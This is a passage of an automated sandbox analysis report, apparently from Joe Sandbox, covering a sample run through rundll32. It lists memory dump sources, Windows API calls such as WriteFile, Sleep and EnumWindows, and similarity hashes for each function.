                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID: Error$Runtime error at 00000000
                              • API String ID: 3320372497-2970929446
                              • Opcode ID: fc744bd4fad775cac841a8ab3aace48e9bce041ecb0703676c88650c4f954abf
                              • Instruction ID: 2603496696cb6051b4d092683045b5ae3c4e9c097ba9fd3436d5f71708f90f71
                              • Opcode Fuzzy Hash: fc744bd4fad775cac841a8ab3aace48e9bce041ecb0703676c88650c4f954abf
                              • Instruction Fuzzy Hash: 9CF0C270BC4388BBFA20A7946D07F5932ACE7C6A18F500219B254A91C4CAA9BC845B31
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 04D4629A
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 04D462A0
                              • GetStdHandle.KERNEL32(000000F4,04D453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04D462BF
                              • WriteFile.KERNEL32(00000000,000000F4,04D453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04D462C5
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,04D453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 04D462DC
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,04D453E8,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 04D462E2
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID:
                              • API String ID: 3320372497-0
                              • Opcode ID: 18a2837b7d5bebf2721e46640201c962a3683552ef95360a89122cc1fbf36a79
                              • Instruction ID: 2fa9c1e84e688552dd11cf8c29e2b97028258d90a6e4142c80d520cdfb0c3758
                              • Opcode Fuzzy Hash: 18a2837b7d5bebf2721e46640201c962a3683552ef95360a89122cc1fbf36a79
                              • Instruction Fuzzy Hash: 4A0131B53542147FF510B6B8AC88F6F2A8CDB96668F500625B218D60D2C954FC0486B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000), ref: 04D45A67
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04D45A7D
                              • Sleep.KERNEL32(00000000), ref: 04D45AAB
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04D45AC1
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: d2f2b934df1022d3fe3713e27b8d6be426efee4c1b459b93c539b7c87d439aca
                              • Instruction ID: ab586adc58ab3b2bb2362d845e832e1bab38e035820dedb4ddeb85611831433d
                              • Opcode Fuzzy Hash: d2f2b934df1022d3fe3713e27b8d6be426efee4c1b459b93c539b7c87d439aca
                              • Instruction Fuzzy Hash: 68C12472A01291EBDB19CF69F5A4315BBE1FBC5310F1882AED6458B384DBB4BC41CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04F364D4,00000000), ref: 04F3661E
                              • ShowWindow.USER32(?,00000000,04F364D4,00000000), ref: 04F36660
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04F3668F
                              • ShowWindow.USER32(?,00000005), ref: 04F36704
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04F36733
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                              • String ID:
                              • API String ID: 315437064-0
                              • Opcode ID: 23e1c63a8a4b89da4a1aa13386bbb17d645128f913dc7402cfd871ade893673a
                              • Instruction ID: c5a9d981afc5f9b604d930617fb171671c92b0ac9dcd9ec8b5a28aaddb338f17
                              • Opcode Fuzzy Hash: 23e1c63a8a4b89da4a1aa13386bbb17d645128f913dc7402cfd871ade893673a
                              • Instruction Fuzzy Hash: 55414270B007409FF730EB38D884B6A73E1EB84359F450569D559CB291CB74F882DB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • UnhookWindowsHookEx.USER32(00000000), ref: 04F356E6
                              • SetEvent.KERNEL32(00000000), ref: 04F35712
                              • GetCurrentThreadId.KERNEL32 ref: 04F35717
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04F35740
                              • CloseHandle.KERNEL32(00000000,00000000), ref: 04F3574D
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                              • String ID:
                              • API String ID: 2132507429-0
                              • Opcode ID: 6f9725749196d8bc0929b0b0f45536d6901ba4ca6d69780b7ad8807deb844901
                              • Instruction ID: 4f4124457266a01350d985d0bc375127809188931909800384f8e6c2dcde78af
                              • Opcode Fuzzy Hash: 6f9725749196d8bc0929b0b0f45536d6901ba4ca6d69780b7ad8807deb844901
                              • Instruction Fuzzy Hash: 1E0162B0B44305AFEB14EF64F944B5A33E4EB44319F408526A9A8C71E0DE34F842DB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 04D4DD89
                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 04D4DDE7
                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 04D4DE44
                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 04D4DE77
                                • Part of subcall function 04D4DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,04D4DDF5), ref: 04D4DD4B
                                • Part of subcall function 04D4DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,04D4DDF5), ref: 04D4DD68
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$LanguagesPreferred$Language
                              • String ID:
                              • API String ID: 2255706666-0
                              • Opcode ID: aeb48c90fd0e82fee010ca3359ff3228504799fd94f88c7cc97cc919f7240b70
                              • Instruction ID: ca9fdc7bdd09c6ce707d88d957337a6d94203a2cff0de7711fc85a1dc75b3f8b
                              • Opcode Fuzzy Hash: aeb48c90fd0e82fee010ca3359ff3228504799fd94f88c7cc97cc919f7240b70
                              • Instruction Fuzzy Hash: C3312B30A0025E9BDF10DFE8D884AEEB7B5FF94304F504575D551E7290DB78AA05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindow.USER32(?,00000004), ref: 04F364E6
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04F36503
                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 04F3650F
                              • IsWindowVisible.USER32(?), ref: 04F36569
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$Process$CurrentThreadVisible
                              • String ID:
                              • API String ID: 3926708836-0
                              • Opcode ID: 4b7db907a9d91505f4239dcbdc7fdf1d7cab0ad864f23941ad057d1c22f8213a
                              • Instruction ID: fef3347ec8f856c1aba2fbb2da489315eb396b51c91fd225babc412699d8df33
                              • Opcode Fuzzy Hash: 4b7db907a9d91505f4239dcbdc7fdf1d7cab0ad864f23941ad057d1c22f8213a
                              • Instruction Fuzzy Hash: 17313A71B00209AFEBA0EF59E8C4AAA73A4EB14314F0441B1ED04E7246DF34FD418B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetActiveWindow.USER32(?,?,04FA01D8,04F37DC8), ref: 04F3714E
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: ActiveWindow
                              • String ID:
                              • API String ID: 2558294473-0
                              • Opcode ID: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction ID: fc217a9e0cd2d31c963b16b08a40a475da039a1fb5363ed6068a23c506cac3a8
                              • Opcode Fuzzy Hash: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction Fuzzy Hash: F7310CB0B00240ABEF54FE68CCC4B8A33D5AF04309F4494B5BD09DF25ADA64FD868B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04F361C0), ref: 04F362B1
                              • GetWindow.USER32(00000003,00000003), ref: 04F362C9
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 04F362D6
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 04F36315
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$EnumLongWindows
                              • String ID:
                              • API String ID: 4191631535-0
                              • Opcode ID: 330eafa3e2c5e8ca9def0b6953016ed528cba76e4cd99a4c8a84549fafb2dbec
                              • Instruction ID: be4f8da28a3f13364913897795ca42a20841f2edbd0c5e1dae09a0439abbd925
                              • Opcode Fuzzy Hash: 330eafa3e2c5e8ca9def0b6953016ed528cba76e4cd99a4c8a84549fafb2dbec
                              • Instruction Fuzzy Hash: 49112A31B04710BFEB20AA28C884F9A7794DB45725F554278FD98EF2D1CB60A846CB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04E73E7D
                              • GetCurrentProcessId.KERNEL32(?,?,00000000,04F3985D,?,?,?,00000001,04F37A37), ref: 04E73E86
                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04E73E9B
                              • GetPropW.USER32(00000000,00000000), ref: 04E73EB2
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                              • String ID:
                              • API String ID: 2582817389-0
                              • Opcode ID: a3ea9fab364f47c830cbe3bcaf3fa15d4a04425f741f56ef11bba772ced5e873
                              • Instruction ID: 2a5c28e6dd054f90c401c926b57f154c4f83ab38c27cd97bf16f360d3bf258d1
                              • Opcode Fuzzy Hash: a3ea9fab364f47c830cbe3bcaf3fa15d4a04425f741f56ef11bba772ced5e873
                              • Instruction Fuzzy Hash: 58F030B17003216AAE61BBB56C8087F759CCB042BD3445821FD49C7151DE29FC45D7B4
                              Uniqueness

                              Uniqueness Score: -1.00%